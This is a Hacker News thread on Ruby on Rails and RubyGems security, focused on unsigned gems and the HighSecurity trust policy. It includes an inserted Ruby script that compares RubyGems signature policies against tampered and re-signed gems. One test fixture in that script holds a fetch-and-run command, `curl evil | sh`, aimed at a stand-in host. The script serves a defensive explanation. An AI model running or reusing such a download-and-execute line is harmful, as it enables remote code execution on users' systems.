

A week with a Rails Security Strategy: More security, new habits - hawe
https://www.airpair.com/ruby-on-rails/posts/a-week-with-a-rails-security-strategy

======
LunaSea
I didn't even know there was such a thing as "Ruby on Rails Security".

~~~
LunaSea
To the people downvoting me:

- [http://www.cvedetails.com/product/22568/Rubyonrails-Ruby-On-...](http://www.cvedetails.com/product/22568/Rubyonrails-Ruby-On-Rails.html?vendor_id=12043)

- [http://www.cvedetails.com/vulnerability-list/vendor_id-12043...](http://www.cvedetails.com/vulnerability-list/vendor_id-12043/product_id-22568/Rubyonrails-Ruby-On-Rails.html)

~~~
astrodust
It's a complicated platform, but on the whole has a very good track record.

Picking on it for having vulnerabilities without providing something in the
way of a comparison is not very meaningful.

~~~
trimble-alum
It's important to pick out vulnerabilities and deficiencies compared to other
projects to get them addressed, rather than only say nice things. However, the
core issue is that people raising them are usually ignored until there's an
embarrassing hack or demonstration (Homakov).

For example, all new gem releases should be signed and `HighSecurity` should
be the policy but it's taken years to get very little progress. Changing to
that policy would prevent entire classes of attacks, attacks that could subtly
inject code into all sorts of apps in difficult-to-find ways. Large projects
are still shipping unsigned gems, unsigned commits and unsigned tags. If
RubyGems were hacked, progress might move slightly faster.

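To make concrete what the `HighSecurity` policy mentioned above actually buys, here is an added example (not code from the post, and not RubyGems' own implementation) that models the three RubyGems trust policies with plain OpenSSL and runs the same gem through four installer scenarios: genuine, tampered after signing, signature stripped, and re-signed by an attacker's own certificate. The gem contents, email addresses and the `Policy` struct are constructed for the example, and RubyGems' separate chain, root and signer checks are collapsed into one self-signed-certificate check; only the policy flags (`only_signed`, `only_trusted`, `verify_data`) follow the real `Gem::Security` definitions.

```ruby
require "openssl"

# Added illustration, not RubyGems' own code: a constructed model of the flags
# behind Gem::Security::{NoSecurity,MediumSecurity,HighSecurity}. RubyGems'
# separate chain/root/signer checks are collapsed into one self-signed-cert check.
Policy = Struct.new(:name, :verify_data, :only_trusted, :only_signed, keyword_init: true)
NO_SECURITY     = Policy.new(name: "NoSecurity",     verify_data: false, only_trusted: false, only_signed: false)
MEDIUM_SECURITY = Policy.new(name: "MediumSecurity", verify_data: true,  only_trusted: true,  only_signed: false)
HIGH_SECURITY   = Policy.new(name: "HighSecurity",   verify_data: true,  only_trusted: true,  only_signed: true)

class GemSecurityError < StandardError; end

DIGEST = "SHA256"

# A self-signed signing certificate, the shape `gem cert --build EMAIL` produces.
def build_signing_cert(email)
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version    = 2
  cert.serial     = 1
  cert.subject    = OpenSSL::X509::Name.new([["CN", email]])
  cert.issuer     = cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 365 * 24 * 60 * 60
  cert.sign(key, OpenSSL::Digest.new(DIGEST))
  [key, cert]
end

# One detached RSA signature per file, as a signed gem carries
# metadata.gz.sig and data.tar.gz.sig next to the files themselves.
def sign_package(files, key, cert)
  sigs = files.transform_values { |data| key.sign(OpenSSL::Digest.new(DIGEST), data) }
  { files: files, signatures: sigs, cert_chain: [cert] }
end

# Apply a policy to a package; returns :ok or raises GemSecurityError.
def verify_package(pkg, policy, trusted_certs)
  if pkg[:signatures].empty?
    raise GemSecurityError, "unsigned gems are not allowed by the #{policy.name} policy" if policy.only_signed
    return :ok # the policy tolerates unsigned gems, so there is nothing to check
  end
  cert = pkg[:cert_chain].last
  if policy.verify_data
    now = Time.now
    raise GemSecurityError, "certificate not valid at this time" unless cert.not_before <= now && now <= cert.not_after
    raise GemSecurityError, "certificate is not self-signed" unless cert.verify(cert.public_key)
    pkg[:files].each do |name, data|
      sig = pkg[:signatures][name]
      raise GemSecurityError, "#{name} has no signature" unless sig
      ok = cert.public_key.verify(OpenSSL::Digest.new(DIGEST), sig, data)
      raise GemSecurityError, "signature for #{name} does not match its contents" unless ok
    end
  end
  if policy.only_trusted && trusted_certs.none? { |t| t.to_der == cert.to_der }
    raise GemSecurityError, "certificate #{cert.subject} is not in the trust store"
  end
  :ok
end

# An install attempt: "ok" or the rejection reason.
def install_result(pkg, policy, trusted)
  verify_package(pkg, policy, trusted)
  "ok"
rescue GemSecurityError => e
  "rejected: #{e.message}"
end

# Four variants of the same gem as an installer would meet them; contents are constructed.
def run_scenarios
  files = { "metadata.gz" => "name: sample-gem\nversion: 1.0.0\n", "data.tar.gz" => "puts 'hello'\n" }
  maintainer_key, maintainer_cert = build_signing_cert("maintainer@example.com")
  attacker_key,   attacker_cert   = build_signing_cert("maintainer@example.com") # same name, different key
  trusted = [maintainer_cert] # what `gem cert --add maintainer.pem` would have installed

  genuine  = sign_package(files, maintainer_key, maintainer_cert)
  tampered = genuine.merge(files: files.merge("data.tar.gz" => "system('curl evil | sh')\n"))
  stripped = { files: tampered[:files], signatures: {}, cert_chain: [] }
  resigned = sign_package(tampered[:files], attacker_key, attacker_cert)

  [NO_SECURITY, MEDIUM_SECURITY, HIGH_SECURITY].to_h do |policy|
    [policy.name, {
      "genuine"  => install_result(genuine, policy, trusted),
      "tampered" => install_result(tampered, policy, trusted),
      "stripped" => install_result(stripped, policy, trusted),
      "resigned" => install_result(resigned, policy, trusted),
    }]
  end
end

if __FILE__ == $PROGRAM_NAME
  run_scenarios.each do |policy, results|
    puts policy
    results.each { |scenario, verdict| puts "  #{scenario.ljust(9)} #{verdict}" }
  end
end
```

The table this prints is the whole argument: `NoSecurity` (the default) installs all four variants, `MediumSecurity` catches the tampered and attacker-re-signed gems but still installs the one whose signature was simply stripped, and only `HighSecurity` refuses that last one. Stripping a signature is trivial for anyone who can modify a gem in transit or on a mirror, so a policy that merely verifies signatures when present protects only gems that were already hard to attack. On a real system the corresponding commands are `gem cert --build you@example.com` to create the signing certificate, `gem cert --add cert.pem` to add a maintainer's certificate to the local trust store, and `gem install foo --trust-policy HighSecurity` to enforce the policy; the catch the comment above points at is that this last command fails for every unsigned gem in the dependency tree.
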
~~~
astrodust
Rubygems has been lagging behind other packagers like Apt, RPM, NPM, and even
newer things like Rust's Cargo. It's woefully overdue for an update.

That being said, there's great services like GemCanary
([https://gemcanary.com/](https://gemcanary.com/)) that will read your Gemfile
and produce a list of vulnerable packages for you automatically. It'll even
email you alerts when there's problems.

The security story in Rails might not be perfect, but at least there's
reporting and tools.

Keep pushing for signed packages, though. Long overdue.

